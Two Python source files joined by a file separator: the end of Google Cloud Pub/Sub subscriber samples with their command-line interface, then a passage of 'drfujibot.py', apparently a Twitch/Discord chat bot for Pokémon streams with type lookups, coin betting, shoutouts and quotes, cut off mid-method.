"""Pulling messages synchronously."""
# [START pubsub_subscriber_sync_pull]
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO subscription_name = "Your Pub/Sub subscription name"
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
NUM_MESSAGES = 3
# The subscriber pulls a specific number of messages.
response = subscriber.pull(subscription_path, max_messages=NUM_MESSAGES)
ack_ids = []
for received_message in response.received_messages:
print("Received: {}".format(received_message.message.data))
ack_ids.append(received_message.ack_id)
# Acknowledges the received messages so they will not be sent again.
subscriber.acknowledge(subscription_path, ack_ids)
print('Received and acknowledged {} messages. Done.'.format(
len(response.received_messages)))
# [END pubsub_subscriber_sync_pull]
def synchronous_pull_with_lease_management(project_id, subscription_name):
"""Pulling messages synchronously with lease management"""
# [START pubsub_subscriber_sync_pull_with_lease]
import logging
import multiprocessing
import random
import time
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO subscription_name = "Your Pub/Sub subscription name"
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
NUM_MESSAGES = 2
ACK_DEADLINE = 30
SLEEP_TIME = 10
# The subscriber pulls a specific number of messages.
response = subscriber.pull(subscription_path, max_messages=NUM_MESSAGES)
multiprocessing.log_to_stderr()
logger = multiprocessing.get_logger()
logger.setLevel(logging.INFO)
def worker(msg):
"""Simulates a long-running process."""
RUN_TIME = random.randint(1, 60)
logger.info('{}: Running {} for {}s'.format(
time.strftime("%X", time.gmtime()), msg.message.data, RUN_TIME))
time.sleep(RUN_TIME)
# `processes` stores process as key and ack id and message as values.
processes = dict()
for message in response.received_messages:
process = multiprocessing.Process(target=worker, args=(message,))
processes[process] = (message.ack_id, message.message.data)
process.start()
while processes:
for process in list(processes):
ack_id, msg_data = processes[process]
# If the process is still running, reset the ack deadline as
# specified by ACK_DEADLINE once every while as specified
# by SLEEP_TIME.
if process.is_alive():
# `ack_deadline_seconds` must be between 10 to 600.
subscriber.modify_ack_deadline(
subscription_path,
[ack_id],
ack_deadline_seconds=ACK_DEADLINE)
logger.info('{}: Reset ack deadline for {} for {}s'.format(
time.strftime("%X", time.gmtime()),
msg_data, ACK_DEADLINE))
# If the processs is finished, acknowledges using `ack_id`.
else:
subscriber.acknowledge(subscription_path, [ack_id])
logger.info("{}: Acknowledged {}".format(
time.strftime("%X", time.gmtime()), msg_data))
processes.pop(process)
# If there are still processes running, sleeps the thread.
if processes:
time.sleep(SLEEP_TIME)
print('Received and acknowledged {} messages. Done.'.format(
len(response.received_messages)))
# [END pubsub_subscriber_sync_pull_with_lease]
def listen_for_errors(project_id, subscription_name):
"""Receives messages and catches errors from a pull subscription."""
# [START pubsub_subscriber_error_listener]
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO subscription_name = "Your Pubsub subscription name"
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
def callback(message):
print('Received message: {}'.format(message))
message.ack()
future = subscriber.subscribe(subscription_path, callback=callback)
# Blocks the thread while messages are coming in through the stream. Any
# exceptions that crop up on the thread will be set on the future.
try:
# When timeout is unspecified, the result method waits indefinitely.
future.result(timeout=30)
except Exception as e:
print(
'Listening for messages on {} threw an Exception: {}.'.format(
subscription_name, e))
# [END pubsub_subscriber_error_listener]
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument('project_id', help='Your Google Cloud project ID')
subparsers = parser.add_subparsers(dest='command')
list_in_topic_parser = subparsers.add_parser(
'list_in_topic', help=list_subscriptions_in_topic.__doc__)
list_in_topic_parser.add_argument('topic_name')
list_in_project_parser = subparsers.add_parser(
'list_in_project', help=list_subscriptions_in_project.__doc__)
create_parser = subparsers.add_parser(
'create', help=create_subscription.__doc__)
create_parser.add_argument('topic_name')
create_parser.add_argument('subscription_name')
create_push_parser = subparsers.add_parser(
'create-push', help=create_push_subscription.__doc__)
create_push_parser.add_argument('topic_name')
create_push_parser.add_argument('subscription_name')
create_push_parser.add_argument('endpoint')
delete_parser = subparsers.add_parser(
'delete', help=delete_subscription.__doc__)
delete_parser.add_argument('subscription_name')
update_parser = subparsers.add_parser(
'update', help=update_subscription.__doc__)
update_parser.add_argument('subscription_name')
update_parser.add_argument('endpoint')
receive_parser = subparsers.add_parser(
'receive', help=receive_messages.__doc__)
receive_parser.add_argument('subscription_name')
receive_with_custom_attributes_parser = subparsers.add_parser(
'receive-custom-attributes',
help=receive_messages_with_custom_attributes.__doc__)
receive_with_custom_attributes_parser.add_argument('subscription_name')
receive_with_flow_control_parser = subparsers.add_parser(
'receive-flow-control',
help=receive_messages_with_flow_control.__doc__)
receive_with_flow_control_parser.add_argument('subscription_name')
synchronous_pull_parser = subparsers.add_parser(
'receive-synchronously',
help=synchronous_pull.__doc__)
synchronous_pull_parser.add_argument('subscription_name')
synchronous_pull_with_lease_management_parser = subparsers.add_parser(
'receive-synchronously-with-lease',
help=synchronous_pull_with_lease_management.__doc__)
synchronous_pull_with_lease_management_parser.add_argument(
'subscription_name')
listen_for_errors_parser = subparsers.add_parser(
'listen_for_errors', help=listen_for_errors.__doc__)
listen_for_errors_parser.add_argument('subscription_name')
args = parser.parse_args()
if args.command == 'list_in_topic':
list_subscriptions_in_topic(args.project_id, args.topic_name)
elif args.command == 'list_in_project':
list_subscriptions_in_project(args.project_id)
elif args.command == 'create':
create_subscription(
args.project_id, args.topic_name, args.subscription_name)
elif args.command == 'create-push':
create_push_subscription(
args.project_id,
args.topic_name,
args.subscription_name,
args.endpoint)
elif args.command == 'delete':
delete_subscription(
args.project_id, args.subscription_name)
elif args.command == 'update':
update_subscription(
args.project_id, args.subscription_name, args.endpoint)
elif args.command == 'receive':
receive_messages(args.project_id, args.subscription_name)
elif args.command == 'receive-custom-attributes':
receive_messages_with_custom_attributes(
args.project_id, args.subscription_name)
elif args.command == 'receive-flow-control':
receive_messages_with_flow_control(
args.project_id, args.subscription_name)
elif args.command == 'receive-synchronously':
synchronous_pull(
args.project_id, args.subscription_name)
elif args.command == 'receive-synchronously-with-lease':
synchronous_pull_with_lease_management(
args.project_id, args.subscription_name)
elif args.command == 'listen_for_errors':
listen_for_errors(args.project_id, args.subscription_name)
|
drfujibot.py
|
import sys
import socket
import datetime
import urllib
import glob
import random
import threading
import types
import time
import random
import drfujibot_irc.bot
import drfujibot_irc.strings
import os
import drfujibot_pykemon.exceptions
import drfujibot_pykemon.request
import drfujibot_pykemon.api
import re
import json
import logging
import discord
import asyncio
import multiprocessing
import operator
import iso8601
import traceback
import copy
import requests
#import requests_cache
from bs4 import BeautifulSoup
from datetime import timedelta
from whoosh.spelling import ListCorrector
from anagram import Anagram
import wikipedia
logger = logging.getLogger(__name__)
handler = logging.StreamHandler(stream=sys.stdout)
logger.addHandler(handler)
def handle_exception(exc_type, exc_value, exc_traceback):
if issubclass(exc_type, KeyboardInterrupt):
sys.__excepthook__(exc_type, exc_value, exc_traceback)
return
logger.error("Uncaught exception", exc_info=(exc_type, exc_value, exc_traceback))
output = str(exc_type) + " " + str(exc_value) + " " + ''.join(traceback.format_tb(exc_traceback)) + "\n"
output += '---------------------------------------------------------\n'
with open('exceptions.log', 'a') as f:
f.write(sys.argv[1] + "\n")
f.write(output)
os._exit(1)
sys.excepthook = handle_exception
g_c = None
g_whisperMode = False
g_bot = None
def fix_pokemon_name(name):
if name.lower() == "pumpkaboo":
name = "pumpkaboo-average"
elif name.lower() == "gourgeist":
name = "gourgeist-average"
elif name.lower() == "darmanitan":
name = "darmanitan-standard"
elif name.lower() == "deoxys":
name = "deoxys-speed"
elif name.lower() == "meowstic":
name = "meowstic-male"
elif name.lower() == "basculin":
name = "basculin-red-striped"
elif name.lower() == "wormadam":
name = "wormadam-plant"
elif name.lower() == "keldeo":
name = "keldeo-ordinary"
elif name.lower() == "wishiwashi":
name = "wishiwashi-solo"
elif name.lower() == "meloetta":
name = "meloetta-aria"
return name
def fix_z_move(name):
if "breakneck-blitz" == name.lower():
name = "breakneck-blitz--physical"
elif "all-out-pummeling" == name.lower():
name = "all-out-pummeling--physical"
elif "supersonic-skystrike" == name.lower():
name = "supersonic-skystrike--physical"
elif "acid-downpour" == name.lower():
name = "acid-downpour--physical"
elif "tectonic-rage" == name.lower():
name = "tectonic-rage--physical"
elif "continental-crush" == name.lower():
name = "continental-crush--physical"
elif "savage-spin-out" == name.lower():
name = "savage-spin-out--physical"
elif "never-ending-nightmare" == name.lower():
name = "never-ending-nightmare--physical"
elif "corkscrew-crash" == name.lower():
name = "corkscrew-crash--physical"
elif "inferno-overdrive" == name.lower():
name = "inferno-overdrive--physical"
elif "hydro-vortex" == name.lower():
name = "hydro-vortex--physical"
elif "bloom-doom" == name.lower():
name = "bloom-doom--physical"
elif "gigavolt-havoc" == name.lower():
name = "gigavolt-havoc--physical"
elif "shattered-psyche" == name.lower():
name = "shattered-psyche--physical"
elif "subzero-slammer" == name.lower():
name = "subzero-slammer--physical"
elif "devastating-drake" == name.lower():
name = "devastating-drake--physical"
elif "black-hole-eclipse" == name.lower():
name = "black-hole-eclipse--physical"
elif "twinkle-tackle" == name.lower():
name = "twinkle-tackle--physical"
return name
def get_coin_balances(source_user):
output = source_user + " : You have "
with open('PokemonChallenges_coins.json', 'r') as coin_file:
coin_info = json.load(coin_file)
coins = coin_info.get('coins')
if None != coins:
if source_user in coins.keys():
output += str(int(coins[source_user]))
output += " coins"
else:
"0 coins"
return output
def get_weaknesses(type1, type2):
weaknesses = []
try:
t1 = drfujibot_pykemon.api.get(type=type1)
t2 = None
if type2:
t2 = drfujibot_pykemon.api.get(type=type2)
weaknesses = [w.get('name') for w in t1.double_damage_from]
if t2:
for w in t2.double_damage_from:
weaknesses.append(w.get('name'))
resistances = [r.get('name') for r in t1.half_damage_from]
if t2:
for r in t2.half_damage_from:
resistances.append(r.get('name'))
no_dmg_types = [t.get('name') for t in t1.no_damage_from]
if t2:
for t in t2.no_damage_from:
no_dmg_types.append(t.get('name'))
# Take out no-damage types outright.
weaknesses = [w for w in weaknesses if w not in no_dmg_types]
# Reduce weakness instance by one for each resistance.
for r in resistances:
if r in weaknesses:
weaknesses.remove(r)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
print("Type(s) not found.")
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
return weaknesses
def get_resistances(type1, type2):
resistances = []
try:
t1 = drfujibot_pykemon.api.get(type=type1)
t2 = None
if type2:
t2 = drfujibot_pykemon.api.get(type=type2)
weaknesses = [w.get('name') for w in t1.double_damage_from]
if t2:
for w in t2.double_damage_from:
weaknesses.append(w.get('name'))
resistances = [r.get('name') for r in t1.half_damage_from]
if t2:
for r in t2.half_damage_from:
resistances.append(r.get('name'))
no_dmg_types = [t.get('name') for t in t1.no_damage_from]
if t2:
for t in t2.no_damage_from:
no_dmg_types.append(t.get('name'))
# Take out no-damage types outright.
resistances = [r for r in resistances if r not in no_dmg_types]
# Reduce resistance instance by one for each weakness.
for w in weaknesses:
if w in resistances:
resistances.remove(w)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
print("Type(s) not found.")
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
return resistances
def get_immunities(type1, type2):
immunities = []
try:
t1 = drfujibot_pykemon.api.get(type=type1)
t2 = None
if type2:
t2 = drfujibot_pykemon.api.get(type=type2)
immunities = [t.get('name') for t in t1.no_damage_from]
if t2:
for t in t2.no_damage_from:
immunities.append(t.get('name'))
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
self.output_msg(c, "Type(s) not found.", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
return immunities
def is_global_command(line):
global_commands = [
"!deaths",
"!sprite",
"!fallen",
"!bet",
"!coins",
"!balance",
"!honestly",
"!daily",
"!song",
"!uptime",
"!fixit",
"!quote",
"!elo",
"!leaderboard",
"!shaq",
"!combo",
"!attempt",
]
for c in global_commands:
if line.startswith(c):
#print("Global command permitted")
return True
return False
def parse_time(time_str):
regex = re.compile(r'((?P<hours>\d+?)h)?((?P<minutes>\d+?)m)?((?P<seconds>\d+?)s)?')
parts = regex.match(time_str)
if not parts:
return
parts = parts.groupdict()
time_params = {}
for (name, param) in parts.items():
if param:
time_params[name] = int(param)
return timedelta(**time_params)
def sort_by_coverage(mv):
super_effective_types = []
types = ['normal', 'fire', 'fighting', 'water', 'flying', 'grass', 'poison', 'electric', 'ground', 'psychic', 'rock', 'ice', 'bug', 'dragon', 'ghost', 'dark', 'steel', 'fairy']
try:
for t in types:
t1 = drfujibot_pykemon.api.get(type=t)
weaknesses = [w.get('name') for w in t1.double_damage_from]
if mv.type in weaknesses:
super_effective_types.append(t)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
self.output_msg(c, "Type(s) not found.", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
print(mv.name + " " + mv.type + " SE against " + str(super_effective_types))
return len(super_effective_types)
def genNameToNum(name):
gen = 0
if "red-blue" in name or "yellow" in name:
gen = 1
elif "gold-silver" in name or "crystal" in name:
gen = 2
elif "ruby-sapphire" in name or "emerald" in name or "firered-leafgreen" in name:
gen = 3
elif "diamond-pearl" in name or "platinum" in name or "heartgold-soulsilver" in name:
gen = 4
elif "black-white" in name or "black-2-white-2" in name:
gen = 5
elif "x-y" in name or "omega-ruby-alpha-sapphire" in name:
gen = 6
elif "sun-moon" in name:
gen = 7
return gen
def getRegionForGame(game):
region = ''
if 'red' == game or 'blue' == game or 'yellow' == game or 'leaf-green' == game or 'fire-red' == game:
region = 'kanto'
elif 'gold' == game or 'silver' == game or 'crystal' == game or 'heart-gold' == game or 'soul-silver' == game:
region = 'johto'
elif 'ruby' == game or 'sapphire' == game or 'emerald' == game or 'omega-ruby' == game or 'alpha-sapphire' == game:
region = 'hoenn'
elif 'diamond' == game or 'pearl' == game or 'platinum' == game:
region = 'sinnoh'
elif 'black' == game or 'white' == game or 'black-2' == game or 'white-2' == game:
region = 'unova'
elif 'x' == game or 'y' == game:
region = 'kalos'
elif 'sun' == game or 'moon' == game:
region = 'alola'
return region
def find_chain(chain, name):
if name == chain.get('species').get('name'):
return chain
else:
for c in chain.get('evolves_to'):
result = find_chain(c, name)
if result:
return result
def get_fuji_config_value(key):
result = None
with open('DrFujiBot_config.json', 'r') as f:
config = json.load(f)
result = config.get(key)
return result
class DrFujiBot(drfujibot_irc.bot.SingleServerIRCBot):
def __init__(self, username, permitted_users, moderators, whisperMode, game, bot_type):
self.game = game
self.bot_type = bot_type
self.whisperMode = whisperMode
twitch_oauth_token = get_fuji_config_value('twitch_oauth_token')
twitch_username = get_fuji_config_value('twitch_username')
drfujibot_irc.bot.SingleServerIRCBot.__init__(self, [("irc.chat.twitch.tv" if True == self.whisperMode else "irc.twitch.tv", 6667, twitch_oauth_token)], twitch_username, twitch_username)
self.channel = "#" + username.lower()
self.username = username
self.start_time = datetime.datetime.now()
self.previous_users = None
if bot_type and bot_type == 'discord':
users_file = 'whisper_discord_users.json'
else:
users_file = 'whisper_users.json'
with open(users_file, 'r') as config_file2:
self.previous_users = json.load(config_file2)
self.bee = []
with open('bee.txt', 'r') as bee_file:
for line in bee_file:
for word in line.split():
self.bee.append(word)
self.shaq = []
with open('shaq.txt', 'r') as shaq_file:
for line in shaq_file:
for word in line.split():
self.shaq.append(word)
self.bee_index = 0
self.shaq_index = 0
self.deaths = 0
# For betting
self.open_events = {}
self.open_event_rewards = {}
self.closed_events = {}
self.last_line = ""
self.same_counter = 0
configname = ""
self.config = None
if bot_type and bot_type == 'discord':
configname = username + '_discord.json'
else:
configname = username + '.json'
coins_config_name = username + '_coins.json'
with open(configname, 'r') as config_file:
self.config = json.load(config_file)
if self.config:
self.bee_index = self.config['bee_index']
if self.config.get('shaq_index'):
self.shaq_index = self.config['shaq_index']
else:
self.shaq_index = 0
if self.config.get('handle_pcwe'):
self.pcwe_thread = threading.Thread(target=self.pcwe_loop)
self.pcwe_thread.start()
if self.config.get('deaths'):
self.deaths = self.config.get('deaths')
self.meme_mode = False
if self.config.get('meme_mode'):
self.meme_mode = self.config.get('meme_mode')
if self.config.get('fallen'):
# Keys are names, values are number of respects paid
self.fallen = self.config.get('fallen')
else:
self.fallen = {}
if self.config.get('fallen_timestamps'):
# Keys are names, values are timestamps of final respects
self.fallen_timestamps = self.config.get('fallen_timestamps')
else:
self.fallen_timestamps = {}
if self.config.get('open_events'):
# event name, bet dict
for (k, v) in self.config['open_events'].items():
self.open_events[k] = v
if None == self.config.get('open_event_rewards'):
self.config['open_event_rewards'] = {}
if self.config.get('open_event_rewards'):
# event name, reward
for (k, v) in self.config['open_event_rewards'].items():
self.open_event_rewards[k] = v
if self.config.get('closed_events'):
# event name, bet dict
for (k, v) in self.config['closed_events'].items():
self.closed_events[k] = v
if None == self.config.get('extra_commands'):
self.config['extra_commands'] = {}
if None == self.config.get('extra_commands_on'):
self.config['extra_commands_on'] = False
if None == self.config.get('winners'):
self.config['winners'] = {}
if None != self.config.get('timed_messages'):
self.timed_message_thread = threading.Thread(target=self.timed_message_loop)
self.timed_message_thread.start()
if None == self.config.get('pokeapi_url'):
self.config['pokeapi_url'] = ''
if None == self.config.get('auto_shoutout'):
self.config['auto_shoutout'] = []
if None == self.config.get('last_auto_shoutout'):
self.config['last_auto_shoutout'] = {}
if None == self.config.get('shoutout_messages'):
self.config['shoutout_message'] = []
if None == self.config.get('command_whitelist'):
self.config['command_whitelist'] = []
if None == self.config.get('quotes'):
self.config['quotes'] = {}
else:
if isinstance(self.config['quotes'], list):
self.config['quotes'] = {}
if None == self.config.get('run_data'):
self.config['run_data'] = {}
if None == self.config.get('highest_combo'):
pair = []
pair.append(0)
pair.append("")
self.config['highest_combo'] = (0, "")
if None == self.config.get('current_run'):
self.config['current_run'] = ""
else:
if None != self.config['run_data'].get(self.config['current_run']):
if None != self.config['run_data'][self.config['current_run']].get('deaths'):
self.deaths = self.config['run_data'][self.config['current_run']]['deaths']
if None != self.config['run_data'][self.config['current_run']].get('closed_events'):
self.config['closed_events'] = self.config['run_data'][self.config['current_run']]['closed_events']
self.bet_config = {}
with open('bet_config.json', 'r') as config_file:
self.bet_config = json.load(config_file)
self.coin_data = {}
self.foundCoinFile = True
try:
with open(coins_config_name, 'r') as config_file:
self.coin_data = json.load(config_file)
if None == self.coin_data.get('last_daily_bonus'):
self.coin_data['last_daily_bonus'] = {}
except:
self.foundCoinFile = False
if self.foundCoinFile:
self.coin_lock = threading.Lock()
startCoinThread = False
if False == self.whisperMode:
if bot_type:
if bot_type != 'discord':
startCoinThread = True
else:
startCoinThread = True
if True == startCoinThread:
self.coin_thread = threading.Thread(target=self.coin_loop)
self.coin_thread.start()
# Keys are names, values are lists of users that paid respects
self.deaths_dict = {}
# Keys are names, values are timestamps
self.current_deaths = {}
self.extra_command_cooldown = {}
self.permissions = True
self.permitted_users = []
self.permitted_users.append(username.lower())
for u in permitted_users:
self.permitted_users.append(u.lower())
self.moderators = []
if None != moderators:
for u in moderators:
self.moderators.append(u.lower())
self.pokemon_corrector = None
with open('pokemon_dictionary.txt', 'r') as pokemon_dict:
lines = pokemon_dict.readlines()
lines = [line.replace('\n', '') for line in lines]
self.pokemon_corrector = ListCorrector(lines)
self.move_corrector = None
with open('move_dictionary.txt', 'r') as move_dict:
lines = move_dict.readlines()
lines = [line.replace('\n', '') for line in lines]
self.move_corrector = ListCorrector(lines)
self.last_lines = []
self.shoutouts_done = []
self.pcce = {}
self.pcce['coins'] = {}
with open('PCCE.json', 'r') as config_file:
self.pcce = json.load(config_file)
self.battle_room = ""
self.ez = False
self.ez_count = 0
self.ez_start = time.time()
def get_current_run_data(self, key):
result = None
if None != self.config['current_run'] and None != self.config['run_data']:
if None == self.config['run_data'].get(self.config['current_run']):
self.config['run_data'][self.config['current_run']] = {}
current_run_data = self.config['run_data'][self.config['current_run']]
if None != current_run_data.get(key):
result = current_run_data[key]
return result
def set_current_run_data(self, key, value):
if None != self.config['current_run'] and None != self.config['run_data']:
if None == self.config['run_data'].get(self.config['current_run']):
self.config['run_data'][self.config['current_run']] = {}
self.config['run_data'][self.config['current_run']][key] = value
def is_setrun_command(self, command):
setrun_commands = [
"!howfar",
"!lastrun",
"!nickname",
"!rules",
]
if None != self.config['current_run'] and None != self.config['run_data']:
return command in setrun_commands
else:
return False
def coin_loop(self):
while True:
with self.coin_lock:
try:
url = 'https://tmi.twitch.tv/group/user/' + self.username.lower() + '/chatters'
response = urllib.request.urlopen(url).read().decode('UTF-8')
user_data = json.loads(response)
user_list = []
for u in user_data['chatters']['moderators']:
user_list.append(u)
for u in user_data['chatters']['viewers']:
user_list.append(u)
for u in user_list:
more_coins = 1
if u in self.coin_data['first_coin_times']:
diff = datetime.datetime.now() - datetime.datetime.fromtimestamp(self.coin_data['first_coin_times'][u])
if diff.days <= 7:
more_coins = 2
else:
more_coins = 2
if u in self.coin_data['coins'].keys():
self.coin_data['coins'][u] += more_coins
else:
self.coin_data['coins'][u] = more_coins
timestamp = time.mktime(datetime.datetime.now().timetuple())
self.coin_data['first_coin_times'][u] = timestamp
self.update_coin_data()
except Exception as e:
print("Coin loop exception: " + str(e))
time.sleep(60)
def pcwe_loop(self):
print("Starting PCWE loop")
path = os.path.join(os.sep, 'home', 'drfujibot', 'drfujibot', 'whispers')
while True:
try:
for fn in os.listdir(path):
fullpath = os.path.join(path, fn)
if os.path.isfile(fullpath):
print("Processing file " + fullpath)
with open(fullpath, 'r') as f:
line = f.readlines()[0]
user = line.split(":")[0]
cmd = line.split(":", 1)[1]
self.processCommand(cmd, self.connection, user)
os.unlink(fullpath)
except Exception as e:
print("Exception: " + str(e))
time.sleep(0.25)
def timed_message_loop(self):
message_list = self.config.get('timed_messages')
if None != message_list:
# Message -> last output timestamp
last_output = {}
# Add last output times now so they don't all display on startup
now = datetime.datetime.now()
now_timestamp = time.mktime(now.timetuple())
for m in message_list:
message = list(m.keys())[0]
last_output[message] = now_timestamp
while True:
now = datetime.datetime.now()
now_timestamp = time.mktime(now.timetuple())
for m in message_list:
message = list(m.keys())[0]
interval = list(m.values())[0]
last_timestamp = last_output.get(message)
last_datetime = datetime.datetime.fromtimestamp(last_timestamp)
output_message = False
diff = now - last_datetime
if diff.seconds >= interval:
output_message = True
if True == output_message:
last_output[message] = now_timestamp
self.output_msg(self.connection, message, 'drfujibot')
time.sleep(1)
def do_shoutout_func(self, c, streamer, output_messages, source_user):
output_messages_copy = output_messages[:]
if len(output_messages_copy) == 0:
output_messages_copy.append("Go check out @" + streamer + " at twitch.tv/" + streamer + " They make great content and if you enjoy us, you will enjoy them as well!")
else:
output_copy = []
for m in output_messages_copy:
output_copy.append(m.replace("STREAMER", streamer))
output_messages_copy = output_copy
for m in output_messages_copy:
self.output_msg(c, m, source_user, 0)
def do_shoutout(self, c, streamer, output_messages, delay_seconds, source_user):
t = threading.Timer(delay_seconds, self.do_shoutout_func, [c, streamer, output_messages, source_user])
t.start()
def resolve_bet(self, c, line, source_user):
if self.foundCoinFile:
if len(line.split(" ")) >= 3:
event_name = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
result = line.split(" ")[2].rstrip("\n").rstrip("\r").lower()
if None != self.bet_config['events'].get(event_name):
if result in self.bet_config['events'][event_name]['outcomes'].keys():
payout = self.open_event_rewards[event_name]
# If it wasn't closed before resolve, close it now
if event_name in self.open_events.keys():
self.closed_events[event_name] = self.open_events[event_name]
del self.open_events[event_name]
del self.open_event_rewards[event_name]
self.config['open_events'] = self.open_events
self.config['open_event_rewards'] = self.open_event_rewards
self.config['closed_events'] = self.closed_events
self.update_config()
if event_name in self.closed_events.keys():
winners = []
all_users = []
pot = 0
log_msg = str(self.closed_events[event_name])
logname = self.username + ".log"
with open(logname, "a") as f:
f.write(log_msg + "\n")
f.flush()
# closed_events -> event_name: {user -> wager, user -> wager, ...}
for k in self.closed_events[event_name].keys():
pot += self.closed_events[event_name][k][1]
bet = self.closed_events[event_name][k][0]
event_mappings = self.bet_config['events'].get(event_name)
result_mappings = None
if None != event_mappings:
result_mappings = event_mappings['mappings'].get(result)
if bet == result or ( None != result_mappings and bet in result_mappings ):
winners.append(k)
all_users.append(k)
if len(winners) > 0:
if self.bet_config['events'].get(event_name):
output = "'" + event_name + "' event winners get a payout! "
else:
output = "Unfortunately, there were no winners for the '" + event_name + "' event"
first_time_winners = []
if len(winners) == 0:
payout = 0
bet_info = self.bet_config['events'].get(event_name)
with self.coin_lock:
for w in winners:
if bet_info:
output += w + '(' + str(int(payout)) + ') '
self.coin_data['coins'][w] += payout
if None == self.config['winners'].get(w):
self.coin_data['coins'][w] += 1000
first_time_winners.append(w)
self.config['winners'][w] = 1
self.update_coin_data()
self.output_msg(c, output, source_user)
if len(first_time_winners) > 0:
self.update_config()
output = "First-time bet winners awarded a 1000 coin bonus: "
output += ", ".join(first_time_winners)
self.output_msg(c, output, source_user)
del self.closed_events[event_name]
self.config['closed_events'] = self.closed_events
if None != self.config['current_run'] and None != self.config['run_data']:
if None != self.config['run_data'].get(self.config['current_run']):
self.config['run_data'][self.config['current_run']]['closed_events'] = {}
self.update_config()
else:
self.output_msg(c, "Could not find active event '" + event_name + "'", source_user)
else:
self.output_msg(c, "Not a valid outcome: '" + result + "'", source_user)
else:
self.output_msg(c, "Could not find active event '" + event_name + "'", source_user)
else:
self.output_msg(c, "Format: !resolve <event_name> <result>", source_user)
else:
self.output_msg(c, "Betting has not been configured", source_user)
def new_bet(self, c, line, source_user):
if self.foundCoinFile:
if len(line.split(" ")) == 3:
event_name = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
event_reward = 0
try:
event_reward = int(line.split(" ")[2].rstrip("\n").rstrip("\r").lower())
except:
self.output_msg(c, "Invalid reward", source_user)
if event_reward > 0:
if len(self.open_events.keys()) == 0:
if event_name not in self.closed_events.keys():
self.open_events[event_name] = {}
self.open_event_rewards[event_name] = event_reward
output = "Betting has opened! Use '!bet <guess>' to play!"
self.output_msg(c, output, source_user)
self.config['open_events'] = self.open_events
self.config['open_event_rewards'] = self.open_event_rewards
self.update_config()
else:
self.output_msg(c, "Existing event '" + event_name + "' must be resolved", source_user)
else:
self.output_msg(c, "There is an open event already in progress: " + list(self.open_events.keys())[0], source_user)
else:
self.output_msg(c, "Format: !event <name> <reward>", source_user)
else:
self.output_msg(c, "Betting has not been configured", source_user)
def get_game(self, username=None):
if self.game and self.whisperMode == False:
return self.game
else:
config = None
game = None
if self.bot_type and self.bot_type == 'discord':
configname = 'whisper_discord.json'
else:
configname = 'whisper.json'
with open(configname, 'r') as config_file:
config = json.load(config_file)
if config:
if self.bot_type and self.bot_type == 'discord':
user = username
else:
user = username.lower()
game = config['games'].get(user)
if None == game:
game = "alpha-sapphire"
return game
def get_game_group(self, user):
group = ''
game = self.get_game(user).lower()
if 'red' == game or 'blue' == game:
group = 'red-blue'
elif 'yellow' == game:
group = 'yellow'
elif 'gold' == game or 'silver' == game:
group = 'gold-silver'
elif 'crystal' == game:
group = 'crystal'
elif 'ruby' == game or 'sapphire' == game:
group = 'ruby-sapphire'
elif 'emerald' == game:
group = 'emerald'
elif 'leaf-green' == game or 'fire-red' == game:
group = 'firered-leafgreen'
elif 'diamond' == game or 'pearl' == game:
group = 'diamond-pearl'
elif 'platinum' == game:
group = 'platinum'
elif 'heart-gold' == game or 'soul-silver' == game:
group = 'heartgold-soulsilver'
elif 'black' == game or 'white' == game:
group = 'black-white'
elif 'black-2' == game or 'white-2' == game:
group = 'black-2-white-2'
elif 'x' == game or 'y' == game:
group = 'x-y'
elif 'omega-ruby' == game or 'alpha-sapphire' == game:
group = 'omega-ruby-alpha-sapphire'
elif 'sun' == game or 'moon' == game:
group = 'sun-moon'
return group
def output_msg(self, c, output, user, sleeptime=2):
chunk_size = 256 - 8
if self.whisperMode:
chunk_size = 256 - 8 - 5 - len(user)
chunks = [ output[i:i+chunk_size] for i in range(0, len(output), chunk_size) ]
j = 1
for ch in chunks:
if len(chunks) > 1:
ch = "(" + str(j) + "/" + str(len(chunks)) + ") " + ch
if self.whisperMode:
c.privmsg("#" + user, "/w " + user + " " + ch)
else:
c.privmsg(self.channel, ch)
print(ch)
if True == self.whisperMode:
logname = 'whisper.log'
else:
logname = self.username + ".log"
with open(logname, "a") as f:
f.write(ch + "\n")
f.flush()
j += 1
time.sleep(sleeptime)
def is_valid_command(self, cmd):
cmd = cmd.lower()
cmds = [
"!commands",
"!help",
"!drfujihelp",
"!uptime",
"!bee",
"!sprite",
"!shaq",
"!fixit",
"!lowkick",
"!grassknot",
"!raid",
"!song",
"!honestly",
"!gender",
"!pokemon",
"!offen",
"!defen",
"!abilities",
"!move",
"!ability",
"!nature",
"!item",
"!learnset",
"!tmset",
"!does",
"!weak",
"!resist",
"!type",
"!setgame",
"!evolve",
"!char",
"!ev",
"!faster",
"!exp",
"!remind",
"!whisper",
"!deaths",
"!setdeaths",
"!rip",
"!ez",
"!fallen",
"!adduser",
"!removeuser",
"!addshoutout",
"!removeshoutout",
"!whatis",
"!anagram",
"!event",
"!close",
"!cancel",
"!resolve",
"!bet",
"!daily",
"!balance",
"!leaderboard",
"!coins",
"!credit",
"!riprun",
"!addcom",
"!editcom",
"!delcom",
"!so ",
"!shoutout",
"!notify",
"!quote",
"!addquote",
"!delquote",
"!elo",
"!smogon",
"!chatbattle",
"!forfeit",
"!heavyslam",
"!heatcrash",
"!setrun",
"!combo",
"!attempt",
"!swearjar",
"!define",
]
for c in cmds:
if cmd.startswith(c):
return True
return False
def is_extra_command(self, cmd):
if True == self.config['extra_commands_on']:
for c in self.config['extra_commands'].keys():
if cmd.lower().startswith(c):
